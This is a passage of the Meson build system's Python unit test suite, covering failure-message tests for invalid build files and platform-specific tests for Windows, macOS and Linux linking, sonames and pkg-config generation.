'version': ['>=1.2.3'],
'has_fallback': False,
'conditional': True
},
{
'name': 'look_i_have_a_fallback',
'required': True,
'version': ['>=1.0.0', '<=99.9.9'],
'has_fallback': True,
'conditional': True
}
]
self.maxDiff = None
self.assertListEqual(res_nb, expected)
def test_unstable_coredata(self):
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
# just test that the command does not fail (e.g. because it throws an exception)
self._run([*self.meson_command, 'unstable-coredata', self.builddir])
@skip_if_no_cmake
def test_cmake_prefix_path(self):
testdir = os.path.join(self.unit_test_dir, '64 cmake_prefix_path')
self.init(testdir, extra_args=['-Dcmake_prefix_path=' + os.path.join(testdir, 'prefix')])
@skip_if_no_cmake
def test_cmake_parser(self):
testdir = os.path.join(self.unit_test_dir, '65 cmake parser')
self.init(testdir, extra_args=['-Dcmake_prefix_path=' + os.path.join(testdir, 'prefix')])
def test_alias_target(self):
if self.backend is Backend.vs:
# FIXME: This unit test is broken with vs backend, needs investigation
raise unittest.SkipTest('Skipping alias_target test with {} backend'.format(self.backend.name))
testdir = os.path.join(self.unit_test_dir, '66 alias target')
self.init(testdir)
self.build()
self.assertPathDoesNotExist(os.path.join(self.builddir, 'prog' + exe_suffix))
self.assertPathDoesNotExist(os.path.join(self.builddir, 'hello.txt'))
self.run_target('build-all')
self.assertPathExists(os.path.join(self.builddir, 'prog' + exe_suffix))
self.assertPathExists(os.path.join(self.builddir, 'hello.txt'))
def test_configure(self):
testdir = os.path.join(self.common_test_dir, '2 cpp')
self.init(testdir)
self._run(self.mconf_command + [self.builddir])
def test_summary(self):
testdir = os.path.join(self.unit_test_dir, '72 summary')
out = self.init(testdir)
expected = textwrap.dedent(r'''
Some Subproject 2.0
string: bar
integer: 1
boolean: True
My Project 1.0
Configuration
Some boolean: False
Another boolean: True
Some string: Hello World
A list: string
1
True
empty list:
A number: 1
yes: YES
no: NO
coma list: a, b, c
Subprojects
sub: YES
sub2: NO Problem encountered: This subproject failed
''')
expected_lines = expected.split('\n')[1:]
out_start = out.find(expected_lines[0])
out_lines = out[out_start:].split('\n')[:len(expected_lines)]
if sys.version_info < (3, 7, 0):
# Dictionary order is not stable in Python <3.7, so sort the lines
# while comparing
self.assertEqual(sorted(expected_lines), sorted(out_lines))
else:
self.assertEqual(expected_lines, out_lines)
def test_meson_compile(self):
"""Test the meson compile command."""
prog = 'trivialprog'
if is_windows():
prog = '{}.exe'.format(prog)
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
self._run([*self.meson_command, 'compile', '-C', self.builddir])
# If compile worked then we should get a program
self.assertPathExists(os.path.join(self.builddir, prog))
self._run([*self.meson_command, 'compile', '-C', self.builddir, '--clean'])
self.assertPathDoesNotExist(os.path.join(self.builddir, prog))
class FailureTests(BasePlatformTests):
'''
Tests that test failure conditions. Build files here should be dynamically
generated and static tests should go into `test cases/failing*`.
This is useful because there can be many ways in which a particular
function can fail, and creating failing tests for all of them is tedious
and slows down testing.
'''
dnf = "[Dd]ependency.*not found(:.*)?"
nopkg = '[Pp]kg-config.*not found'
def setUp(self):
super().setUp()
self.srcdir = os.path.realpath(tempfile.mkdtemp())
self.mbuild = os.path.join(self.srcdir, 'meson.build')
self.moptions = os.path.join(self.srcdir, 'meson_options.txt')
def tearDown(self):
super().tearDown()
windows_proof_rmtree(self.srcdir)
def assertMesonRaises(self, contents, match, *,
extra_args=None,
langs=None,
meson_version=None,
options=None,
override_envvars=None):
'''
Assert that running meson configure on the specified @contents raises
a error message matching regex @match.
'''
if langs is None:
langs = []
with open(self.mbuild, 'w') as f:
f.write("project('failure test', 'c', 'cpp'")
if meson_version:
f.write(", meson_version: '{}'".format(meson_version))
f.write(")\n")
for lang in langs:
f.write("add_languages('{}', required : false)\n".format(lang))
f.write(contents)
if options is not None:
with open(self.moptions, 'w') as f:
f.write(options)
o = {'MESON_FORCE_BACKTRACE': '1'}
if override_envvars is None:
override_envvars = o
else:
override_envvars.update(o)
# Force tracebacks so we can detect them properly
with self.assertRaisesRegex(MesonException, match, msg=contents):
# Must run in-process or we'll get a generic CalledProcessError
self.init(self.srcdir, extra_args=extra_args,
inprocess=True,
override_envvars = override_envvars)
def obtainMesonOutput(self, contents, match, extra_args, langs, meson_version=None):
if langs is None:
langs = []
with open(self.mbuild, 'w') as f:
f.write("project('output test', 'c', 'cpp'")
if meson_version:
f.write(", meson_version: '{}'".format(meson_version))
f.write(")\n")
for lang in langs:
f.write("add_languages('{}', required : false)\n".format(lang))
f.write(contents)
# Run in-process for speed and consistency with assertMesonRaises
return self.init(self.srcdir, extra_args=extra_args, inprocess=True)
def assertMesonOutputs(self, contents, match, extra_args=None, langs=None, meson_version=None):
'''
Assert that running meson configure on the specified @contents outputs
something that matches regex @match.
'''
out = self.obtainMesonOutput(contents, match, extra_args, langs, meson_version)
self.assertRegex(out, match)
def assertMesonDoesNotOutput(self, contents, match, extra_args=None, langs=None, meson_version=None):
'''
Assert that running meson configure on the specified @contents does not output
something that matches regex @match.
'''
out = self.obtainMesonOutput(contents, match, extra_args, langs, meson_version)
self.assertNotRegex(out, match)
@skipIfNoPkgconfig
def test_dependency(self):
if subprocess.call(['pkg-config', '--exists', 'zlib']) != 0:
raise unittest.SkipTest('zlib not found with pkg-config')
a = (("dependency('zlib', method : 'fail')", "'fail' is invalid"),
("dependency('zlib', static : '1')", "[Ss]tatic.*boolean"),
("dependency('zlib', version : 1)", "[Vv]ersion.*string or list"),
("dependency('zlib', required : 1)", "[Rr]equired.*boolean"),
("dependency('zlib', method : 1)", "[Mm]ethod.*string"),
("dependency('zlibfail')", self.dnf),)
for contents, match in a:
self.assertMesonRaises(contents, match)
def test_apple_frameworks_dependency(self):
if not is_osx():
raise unittest.SkipTest('only run on macOS')
self.assertMesonRaises("dependency('appleframeworks')",
"requires at least one module")
def test_extraframework_dependency_method(self):
code = "dependency('python', method : 'extraframework')"
if not is_osx():
self.assertMesonRaises(code, self.dnf)
else:
# Python2 framework is always available on macOS
self.assertMesonOutputs(code, '[Dd]ependency.*python.*found.*YES')
def test_sdl2_notfound_dependency(self):
# Want to test failure, so skip if available
if shutil.which('sdl2-config'):
raise unittest.SkipTest('sdl2-config found')
self.assertMesonRaises("dependency('sdl2', method : 'sdlconfig')", self.dnf)
if shutil.which('pkg-config'):
self.assertMesonRaises("dependency('sdl2', method : 'pkg-config')", self.dnf)
with no_pkgconfig():
# Look for pkg-config, cache it, then
# Use cached pkg-config without erroring out, then
# Use cached pkg-config to error out
code = "dependency('foobarrr', method : 'pkg-config', required : false)\n" \
"dependency('foobarrr2', method : 'pkg-config', required : false)\n" \
"dependency('sdl2', method : 'pkg-config')"
self.assertMesonRaises(code, self.nopkg)
def test_gnustep_notfound_dependency(self):
# Want to test failure, so skip if available
if shutil.which('gnustep-config'):
raise unittest.SkipTest('gnustep-config found')
self.assertMesonRaises("dependency('gnustep')",
"(requires a Objc compiler|{})".format(self.dnf),
langs = ['objc'])
def test_wx_notfound_dependency(self):
# Want to test failure, so skip if available
if shutil.which('wx-config-3.0') or shutil.which('wx-config') or shutil.which('wx-config-gtk3'):
raise unittest.SkipTest('wx-config, wx-config-3.0 or wx-config-gtk3 found')
self.assertMesonRaises("dependency('wxwidgets')", self.dnf)
self.assertMesonOutputs("dependency('wxwidgets', required : false)",
"Run-time dependency .*WxWidgets.* found: .*NO.*")
def test_wx_dependency(self):
if not shutil.which('wx-config-3.0') and not shutil.which('wx-config') and not shutil.which('wx-config-gtk3'):
raise unittest.SkipTest('Neither wx-config, wx-config-3.0 nor wx-config-gtk3 found')
self.assertMesonRaises("dependency('wxwidgets', modules : 1)",
"module argument is not a string")
def test_llvm_dependency(self):
self.assertMesonRaises("dependency('llvm', modules : 'fail')",
"(required.*fail|{})".format(self.dnf))
def test_boost_notfound_dependency(self):
# Can be run even if Boost is found or not
self.assertMesonRaises("dependency('boost', modules : 1)",
"module.*not a string")
self.assertMesonRaises("dependency('boost', modules : 'fail')",
"(fail.*not found|{})".format(self.dnf))
def test_boost_BOOST_ROOT_dependency(self):
# Test BOOST_ROOT; can be run even if Boost is found or not
self.assertMesonRaises("dependency('boost')",
"(BOOST_ROOT.*absolute|{})".format(self.dnf),
override_envvars = {'BOOST_ROOT': 'relative/path'})
def test_dependency_invalid_method(self):
code = '''zlib_dep = dependency('zlib', required : false)
zlib_dep.get_configtool_variable('foo')
'''
self.assertMesonRaises(code, ".* is not a config-tool dependency")
code = '''zlib_dep = dependency('zlib', required : false)
dep = declare_dependency(dependencies : zlib_dep)
dep.get_pkgconfig_variable('foo')
'''
self.assertMesonRaises(code, "Method.*pkgconfig.*is invalid.*internal")
code = '''zlib_dep = dependency('zlib', required : false)
dep = declare_dependency(dependencies : zlib_dep)
dep.get_configtool_variable('foo')
'''
self.assertMesonRaises(code, "Method.*configtool.*is invalid.*internal")
def test_objc_cpp_detection(self):
'''
Test that when we can't detect objc or objcpp, we fail gracefully.
'''
env = get_fake_env()
try:
env.detect_objc_compiler(MachineChoice.HOST)
env.detect_objcpp_compiler(MachineChoice.HOST)
except EnvironmentException:
code = "add_languages('objc')\nadd_languages('objcpp')"
self.assertMesonRaises(code, "Unknown compiler")
return
raise unittest.SkipTest("objc and objcpp found, can't test detection failure")
def test_subproject_variables(self):
'''
Test that:
1. The correct message is outputted when a not-required dep is not
found and the fallback subproject is also not found.
2. A not-required fallback dependency is not found because the
subproject failed to parse.
3. A not-found not-required dep with a fallback subproject outputs the
correct message when the fallback subproject is found but the
variable inside it is not.
4. A fallback dependency is found from the subproject parsed in (3)
5. The correct message is outputted when the .wrap file is missing for
a sub-subproject.
'''
tdir = os.path.join(self.unit_test_dir, '20 subproj dep variables')
out = self.init(tdir, inprocess=True)
self.assertRegex(out, r"Subproject directory not found and .*nosubproj.wrap.* file not found")
self.assertRegex(out, r'Function does not take positional arguments.')
self.assertRegex(out, r'WARNING:.* Dependency .*subsubproject.* not found but it is available in a sub-subproject.')
self.assertRegex(out, r'Subproject directory not found and .*subsubproject.wrap.* file not found')
self.assertRegex(out, r'Dependency .*zlibproxy.* from subproject .*subprojects.*somesubproj.* found: .*YES.*')
def test_exception_exit_status(self):
'''
Test exit status on python exception
'''
tdir = os.path.join(self.unit_test_dir, '21 exit status')
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(tdir, inprocess=False, override_envvars = {'MESON_UNIT_TEST': '1'})
self.assertEqual(cm.exception.returncode, 2)
self.wipe()
def test_dict_requires_key_value_pairs(self):
self.assertMesonRaises("dict = {3, 'foo': 'bar'}",
'Only key:value pairs are valid in dict construction.')
self.assertMesonRaises("{'foo': 'bar', 3}",
'Only key:value pairs are valid in dict construction.')
def test_dict_forbids_duplicate_keys(self):
self.assertMesonRaises("dict = {'a': 41, 'a': 42}",
'Duplicate dictionary key: a.*')
def test_dict_forbids_integer_key(self):
self.assertMesonRaises("dict = {3: 'foo'}",
'Key must be a string.*')
def test_using_too_recent_feature(self):
# Here we use a dict, which was introduced in 0.47.0
self.assertMesonOutputs("dict = {}",
".*WARNING.*Project targeting.*but.*",
meson_version='>= 0.46.0')
def test_using_recent_feature(self):
# Same as above, except the meson version is now appropriate
self.assertMesonDoesNotOutput("dict = {}",
".*WARNING.*Project targeting.*but.*",
meson_version='>= 0.47')
def test_using_too_recent_feature_dependency(self):
self.assertMesonOutputs("dependency('pcap', required: false)",
".*WARNING.*Project targeting.*but.*",
meson_version='>= 0.41.0')
def test_vcs_tag_featurenew_build_always_stale(self):
'https://github.com/mesonbuild/meson/issues/3904'
vcs_tag = '''version_data = configuration_data()
version_data.set('PROJVER', '@VCS_TAG@')
vf = configure_file(output : 'version.h.in', configuration: version_data)
f = vcs_tag(input : vf, output : 'version.h')
'''
msg = '.*WARNING:.*feature.*build_always_stale.*custom_target.*'
self.assertMesonDoesNotOutput(vcs_tag, msg, meson_version='>=0.43')
def test_missing_subproject_not_required_and_required(self):
self.assertMesonRaises("sub1 = subproject('not-found-subproject', required: false)\n" +
"sub2 = subproject('not-found-subproject', required: true)",
""".*Subproject "subprojects/not-found-subproject" required but not found.*""")
def test_get_variable_on_not_found_project(self):
self.assertMesonRaises("sub1 = subproject('not-found-subproject', required: false)\n" +
"sub1.get_variable('naaa')",
"""Subproject "subprojects/not-found-subproject" disabled can't get_variable on it.""")
def test_version_checked_before_parsing_options(self):
'''
https://github.com/mesonbuild/meson/issues/5281
'''
options = "option('some-option', type: 'foo', value: '')"
match = 'Meson version is.*but project requires >=2000'
self.assertMesonRaises("", match, meson_version='>=2000', options=options)
def test_assert_default_message(self):
self.assertMesonRaises("k1 = 'a'\n" +
"assert({\n" +
" k1: 1,\n" +
"}['a'] == 2)\n",
r"Assert failed: {k1 : 1}\['a'\] == 2")
def test_wrap_nofallback(self):
self.assertMesonRaises("dependency('notfound', fallback : ['foo', 'foo_dep'])",
r"Dependency \'notfound\' not found and fallback is disabled",
extra_args=['--wrap-mode=nofallback'])
def test_message(self):
self.assertMesonOutputs("message('Array:', ['a', 'b'])",
r"Message:.* Array: \['a', 'b'\]")
def test_warning(self):
self.assertMesonOutputs("warning('Array:', ['a', 'b'])",
r"WARNING:.* Array: \['a', 'b'\]")
@unittest.skipUnless(is_windows() or is_cygwin(), "requires Windows (or Windows via Cygwin)")
class WindowsTests(BasePlatformTests):
'''
Tests that should run on Cygwin, MinGW, and MSVC
'''
def setUp(self):
super().setUp()
self.platform_test_dir = os.path.join(self.src_root, 'test cases/windows')
@unittest.skipIf(is_cygwin(), 'Test only applicable to Windows')
def test_find_program(self):
'''
Test that Windows-specific edge-cases in find_program are functioning
correctly. Cannot be an ordinary test because it involves manipulating
PATH to point to a directory with Python scripts.
'''
testdir = os.path.join(self.platform_test_dir, '8 find program')
# Find `cmd` and `cmd.exe`
prog1 = ExternalProgram('cmd')
self.assertTrue(prog1.found(), msg='cmd not found')
prog2 = ExternalProgram('cmd.exe')
self.assertTrue(prog2.found(), msg='cmd.exe not found')
self.assertPathEqual(prog1.get_path(), prog2.get_path())
# Find cmd with an absolute path that's missing the extension
cmd_path = prog2.get_path()[:-4]
prog = ExternalProgram(cmd_path)
self.assertTrue(prog.found(), msg='{!r} not found'.format(cmd_path))
# Finding a script with no extension inside a directory works
prog = ExternalProgram(os.path.join(testdir, 'test-script'))
self.assertTrue(prog.found(), msg='test-script not found')
# Finding a script with an extension inside a directory works
prog = ExternalProgram(os.path.join(testdir, 'test-script-ext.py'))
self.assertTrue(prog.found(), msg='test-script-ext.py not found')
# Finding a script in PATH
os.environ['PATH'] += os.pathsep + testdir
# Finding a script in PATH w/o extension works and adds the interpreter
# (check only if `.PY` is in PATHEXT)
if '.PY' in [ext.upper() for ext in os.environ['PATHEXT'].split(';')]:
prog = ExternalProgram('test-script-ext')
self.assertTrue(prog.found(), msg='test-script-ext not found in PATH')
self.assertPathEqual(prog.get_command()[0], python_command[0])
self.assertPathBasenameEqual(prog.get_path(), 'test-script-ext.py')
# Finding a script in PATH with extension works and adds the interpreter
prog = ExternalProgram('test-script-ext.py')
self.assertTrue(prog.found(), msg='test-script-ext.py not found in PATH')
self.assertPathEqual(prog.get_command()[0], python_command[0])
self.assertPathBasenameEqual(prog.get_path(), 'test-script-ext.py')
# Ensure that WindowsApps gets removed from PATH
path = os.environ['PATH']
if 'WindowsApps' not in path:
username = os.environ['USERNAME']
appstore_dir = r'C:\Users\{}\AppData\Local\Microsoft\WindowsApps'.format(username)
path = os.pathsep + appstore_dir
path = ExternalProgram._windows_sanitize_path(path)
self.assertNotIn('WindowsApps', path)
def test_ignore_libs(self):
'''
Test that find_library on libs that are to be ignored returns an empty
array of arguments. Must be a unit test because we cannot inspect
ExternalLibraryHolder from build files.
'''
testdir = os.path.join(self.platform_test_dir, '1 basic')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Not using MSVC')
# To force people to update this test, and also test
self.assertEqual(set(cc.ignore_libs), {'c', 'm', 'pthread', 'dl', 'rt', 'execinfo'})
for l in cc.ignore_libs:
self.assertEqual(cc.find_library(l, env, []), [])
def test_rc_depends_files(self):
testdir = os.path.join(self.platform_test_dir, '5 resources')
# resource compiler depfile generation is not yet implemented for msvc
env = get_fake_env(testdir, self.builddir, self.prefix)
depfile_works = env.detect_c_compiler(MachineChoice.HOST).get_id() not in {'msvc', 'clang-cl', 'intel-cl'}
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Test compile_resources(depend_file:)
# Changing mtime of sample.ico should rebuild prog
self.utime(os.path.join(testdir, 'res', 'sample.ico'))
self.assertRebuiltTarget('prog')
# Test depfile generation by compile_resources
# Changing mtime of resource.h should rebuild myres.rc and then prog
if depfile_works:
self.utime(os.path.join(testdir, 'inc', 'resource', 'resource.h'))
self.assertRebuiltTarget('prog')
self.wipe()
if depfile_works:
testdir = os.path.join(self.platform_test_dir, '12 resources with custom targets')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of resource.h should rebuild myres_1.rc and then prog_1
self.utime(os.path.join(testdir, 'res', 'resource.h'))
self.assertRebuiltTarget('prog_1')
def test_msvc_cpp17(self):
testdir = os.path.join(self.unit_test_dir, '45 vscpp17')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Test only applies to MSVC-like compilers')
try:
self.init(testdir)
except subprocess.CalledProcessError:
# According to Python docs, output is only stored when
# using check_output. We don't use it, so we can't check
# that the output is correct (i.e. that it failed due
# to the right reason).
return
self.build()
def test_install_pdb_introspection(self):
testdir = os.path.join(self.platform_test_dir, '1 basic')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Test only applies to MSVC-like compilers')
self.init(testdir)
installed = self.introspect('--installed')
files = [os.path.basename(path) for path in installed.values()]
self.assertTrue('prog.pdb' in files)
def _check_ld(self, name: str, lang: str, expected: str) -> None:
if not shutil.which(name):
raise unittest.SkipTest('Could not find {}.'.format(name))
envvar = mesonbuild.envconfig.BinaryTable.evarMap['{}_ld'.format(lang)]
with mock.patch.dict(os.environ, {envvar: name}):
env = get_fake_env()
try:
comp = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
except EnvironmentException:
raise unittest.SkipTest('Could not find a compiler for {}'.format(lang))
self.assertEqual(comp.linker.id, expected)
def test_link_environment_variable_lld_link(self):
self._check_ld('lld-link', 'c', 'lld-link')
def test_link_environment_variable_link(self):
self._check_ld('link', 'c', 'link')
def test_link_environment_variable_optlink(self):
self._check_ld('optlink', 'c', 'optlink')
def test_link_environment_variable_rust(self):
self._check_ld('link', 'rust', 'link')
def test_pefile_checksum(self):
try:
import pefile
except ImportError:
if is_ci():
raise
raise unittest.SkipTest('pefile module not found')
testdir = os.path.join(self.common_test_dir, '6 linkshared')
self.init(testdir)
self.build()
# Test that binaries have a non-zero checksum
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
cc_id = cc.get_id()
ld_id = cc.get_linker_id()
dll = glob(os.path.join(self.builddir, '*mycpplib.dll'))[0]
exe = os.path.join(self.builddir, 'cppprog.exe')
for f in (dll, exe):
pe = pefile.PE(f)
msg = 'PE file: {!r}, compiler: {!r}, linker: {!r}'.format(f, cc_id, ld_id)
if cc_id == 'clang-cl':
# Latest clang-cl tested (7.0) does not write checksums out
self.assertFalse(pe.verify_checksum(), msg=msg)
else:
# Verify that a valid checksum was written by all other compilers
self.assertTrue(pe.verify_checksum(), msg=msg)
@unittest.skipUnless(is_osx(), "requires Darwin")
class DarwinTests(BasePlatformTests):
'''
Tests that should run on macOS
'''
def setUp(self):
super().setUp()
self.platform_test_dir = os.path.join(self.src_root, 'test cases/osx')
def test_apple_bitcode(self):
'''
Test that -fembed-bitcode is correctly added while compiling and
-bitcode_bundle is added while linking when b_bitcode is true and not
when it is false. This can't be an ordinary test case because we need
to inspect the compiler database.
'''
testdir = os.path.join(self.platform_test_dir, '7 bitcode')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.id != 'clang':
raise unittest.SkipTest('Not using Clang on OSX')
# Try with bitcode enabled
out = self.init(testdir, extra_args='-Db_bitcode=true')
# Warning was printed
self.assertRegex(out, 'WARNING:.*b_bitcode')
# Compiler options were added
for compdb in self.get_compdb():
if 'module' in compdb['file']:
self.assertNotIn('-fembed-bitcode', compdb['command'])
else:
self.assertIn('-fembed-bitcode', compdb['command'])
build_ninja = os.path.join(self.builddir, 'build.ninja')
# Linker options were added
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('LINK_ARGS =.*-bitcode_bundle', contents)
self.assertIsNotNone(m, msg=contents)
# Try with bitcode disabled
self.setconf('-Db_bitcode=false')
# Regenerate build
self.build()
for compdb in self.get_compdb():
self.assertNotIn('-fembed-bitcode', compdb['command'])
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('LINK_ARGS =.*-bitcode_bundle', contents)
self.assertIsNone(m, msg=contents)
def test_apple_bitcode_modules(self):
'''
Same as above, just for shared_module()
'''
testdir = os.path.join(self.common_test_dir, '152 shared module resolving symbol in executable')
# Ensure that it builds even with bitcode enabled
self.init(testdir, extra_args='-Db_bitcode=true')
self.build()
self.run_tests()
def _get_darwin_versions(self, fname):
fname = os.path.join(self.builddir, fname)
out = subprocess.check_output(['otool', '-L', fname], universal_newlines=True)
m = re.match(r'.*version (.*), current version (.*)\)', out.split('\n')[1])
self.assertIsNotNone(m, msg=out)
return m.groups()
@skipIfNoPkgconfig
def test_library_versioning(self):
'''
Ensure that compatibility_version and current_version are set correctly
'''
testdir = os.path.join(self.platform_test_dir, '2 library versions')
self.init(testdir)
self.build()
targets = {}
for t in self.introspect('--targets'):
targets[t['name']] = t['filename'][0] if isinstance(t['filename'], list) else t['filename']
self.assertEqual(self._get_darwin_versions(targets['some']), ('7.0.0', '7.0.0'))
self.assertEqual(self._get_darwin_versions(targets['noversion']), ('0.0.0', '0.0.0'))
self.assertEqual(self._get_darwin_versions(targets['onlyversion']), ('1.0.0', '1.0.0'))
self.assertEqual(self._get_darwin_versions(targets['onlysoversion']), ('5.0.0', '5.0.0'))
self.assertEqual(self._get_darwin_versions(targets['intver']), ('2.0.0', '2.0.0'))
self.assertEqual(self._get_darwin_versions(targets['stringver']), ('2.3.0', '2.3.0'))
self.assertEqual(self._get_darwin_versions(targets['stringlistver']), ('2.4.0', '2.4.0'))
self.assertEqual(self._get_darwin_versions(targets['intstringver']), ('1111.0.0', '2.5.0'))
self.assertEqual(self._get_darwin_versions(targets['stringlistvers']), ('2.6.0', '2.6.1'))
def test_duplicate_rpath(self):
testdir = os.path.join(self.unit_test_dir, '10 build_rpath')
# We purposely pass a duplicate rpath to Meson, in order
# to ascertain that Meson does not call install_name_tool
# with duplicate -delete_rpath arguments, which would
# lead to erroring out on installation
env = {"LDFLAGS": "-Wl,-rpath,/foo/bar"}
self.init(testdir, override_envvars=env)
self.build()
self.install()
def test_removing_unused_linker_args(self):
testdir = os.path.join(self.common_test_dir, '108 has arg')
env = {'CFLAGS': '-L/tmp -L /var/tmp -headerpad_max_install_names -Wl,-export_dynamic'}
self.init(testdir, override_envvars=env)
@unittest.skipUnless(not is_windows(), "requires something Unix-like")
class LinuxlikeTests(BasePlatformTests):
'''
Tests that should run on Linux, macOS, and *BSD
'''
def test_basic_soname(self):
'''
Test that the soname is set correctly for shared libraries. This can't
be an ordinary test case because we need to run `readelf` and actually
check the soname.
https://github.com/mesonbuild/meson/issues/785
'''
testdir = os.path.join(self.common_test_dir, '4 shared')
self.init(testdir)
self.build()
lib1 = os.path.join(self.builddir, 'libmylib.so')
soname = get_soname(lib1)
self.assertEqual(soname, 'libmylib.so')
def test_custom_soname(self):
'''
Test that the soname is set correctly for shared libraries when
a custom prefix and/or suffix is used. This can't be an ordinary test
case because we need to run `readelf` and actually check the soname.
https://github.com/mesonbuild/meson/issues/785
'''
testdir = os.path.join(self.common_test_dir, '25 library versions')
self.init(testdir)
self.build()
lib1 = os.path.join(self.builddir, 'prefixsomelib.suffix')
soname = get_soname(lib1)
self.assertEqual(soname, 'prefixsomelib.suffix')
def test_pic(self):
'''
Test that -fPIC is correctly added to static libraries when b_staticpic
is true and not when it is false. This can't be an ordinary test case
because we need to inspect the compiler database.
'''
if is_windows() or is_cygwin() or is_osx():
raise unittest.SkipTest('PIC not relevant')
testdir = os.path.join(self.common_test_dir, '3 static')
self.init(testdir)
compdb = self.get_compdb()
self.assertIn('-fPIC', compdb[0]['command'])
self.setconf('-Db_staticpic=false')
# Regenerate build
self.build()
compdb = self.get_compdb()
self.assertNotIn('-fPIC', compdb[0]['command'])
def test_pkgconfig_gen(self):
'''
Test that generated pkg-config files can be found and have the correct
version and link args. This can't be an ordinary test case because we
need to run pkg-config outside of a Meson build file.
https://github.com/mesonbuild/meson/issues/889
'''
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
self.init(testdir)
env = get_fake_env(testdir, self.builddir, self.prefix)
kwargs = {'required': True, 'silent': True}
os.environ['PKG_CONFIG_LIBDIR'] = self.privatedir
foo_dep = PkgConfigDependency('libfoo', env, kwargs)
self.assertTrue(foo_dep.found())
self.assertEqual(foo_dep.get_version(), '1.0')
self.assertIn('-lfoo', foo_dep.get_link_args())
self.assertEqual(foo_dep.get_pkgconfig_variable('foo', {}), 'bar')
self.assertPathEqual(foo_dep.get_pkgconfig_variable('datadir', {}), '/usr/data')
libhello_nolib = PkgConfigDependency('libhello_nolib', env, kwargs)
self.assertTrue(libhello_nolib.found())
self.assertEqual(libhello_nolib.get_link_args(), [])
self.assertEqual(libhello_nolib.get_compile_args(), [])
def test_pkgconfig_gen_deps(self):
'''
Test that generated pkg-config files correctly handle dependencies
'''
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
self.init(testdir)
privatedir1 = self.privatedir
self.new_builddir()
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen', 'dependencies')
self.init(testdir, override_envvars={'PKG_CONFIG_LIBDIR': privatedir1})
privatedir2 = self.privatedir
os.environ
env = {
'PKG_CONFIG_LIBDIR': os.pathsep.join([privatedir1, privatedir2]),
'PKG_CONFIG_SYSTEM_LIBRARY_PATH': '/usr/lib',
}
self._run(['pkg-config', 'dependency-test', '--validate'], override_envvars=env)
# pkg-config strips some duplicated flags so we have to parse the
# generated file ourself.
expected = {
'Requires': 'libexposed',
'Requires.private': 'libfoo >= 1.0',
'Libs': '-L${libdir} -llibmain -pthread -lcustom',
'Libs.private': '-lcustom2 -L${libdir} -llibinternal',
'Cflags': '-I${includedir} -pthread -DCUSTOM',
}
if is_osx() or is_haiku():
expected['Cflags'] = expected['Cflags'].replace('-pthread ', '')
with open(os.path.join(privatedir2, 'dependency-test.pc')) as f:
matched_lines = 0
for line in f:
parts = line.split(':', 1)
if parts[0] in expected:
key = parts[0]
val = parts[1].strip()
expected_val = expected[key]
self.assertEqual(expected_val, val)
matched_lines += 1
self.assertEqual(len(expected), matched_lines)
cmd = ['pkg-config', 'requires-test']
out = self._run(cmd + ['--print-requires'], override_envvars=env).strip().split('\n')
if not is_openbsd():
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo >= 1.0', 'libhello']))
else:
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo>=1.0', 'libhello']))
cmd = ['pkg-config', 'requires-private-test']
out = self._run(cmd + ['--print-requires-private'], override_envvars=env).strip().split('\n')
if not is_openbsd():
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo >= 1.0', 'libhello']))
else:
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo>=1.0', 'libhello']))
cmd = ['pkg-config', 'pub-lib-order']
out = self._run(cmd + ['--libs'], override_envvars=env).strip().split()
self.assertEqual(out, ['-llibmain2', '-llibinternal'])
def test_pkgconfig_uninstalled(self):
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
self.init(testdir)
self.build()
os.environ['PKG_CONFIG_LIBDIR'] = os.path.join(self.builddir, 'meson-uninstalled')
if is_cygwin():
os.environ['PATH'] += os.pathsep + self.builddir
self.new_builddir()
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen', 'dependencies')
self.init(testdir)
self.build()
self.run_tests()
def test_pkg_unfound(self):
testdir = os.path.join(self.unit_test_dir, '23 unfound pkgconfig')
self.init(testdir)
with open(os.path.join(self.privatedir, 'somename.pc')) as f:
pcfile = f.read()
self.assertFalse('blub_blob_blib' in pcfile)
def test_vala_c_warnings(self):
'''
Test that no warnings are emitted for C code generated by Vala. This
can't be an ordinary test case because we need to inspect the compiler
database.
https://github.com/mesonbuild/meson/issues/864
'''
if not shutil.which('valac'):
raise unittest.SkipTest('valac not installed.')
testdir = os.path.join(self.vala_test_dir, '5 target glib')
self.init(testdir)
compdb = self.get_compdb()
vala_command = None
c_command = None
for each in compdb:
if each['file'].endswith('GLib.Thread.c'):
vala_command = each['command']
elif each['file'].endswith('GLib.Thread.vala'):
continue
elif each['file'].endswith('retcode.c'):
c_command = each['command']
else:
m = 'Unknown file {!r} in vala_c_warnings test'.format(each['file'])
raise AssertionError(m)
self.assertIsNotNone(vala_command)
self.assertIsNotNone(c_command)
# -w suppresses all warnings, should be there in Vala but not in C
self.assertIn(" -w ", vala_command)
self.assertNotIn(" -w ", c_command)
# -Wall enables all warnings, should be there in C but not in Vala
self.assertNotIn(" -Wall ", vala_command)
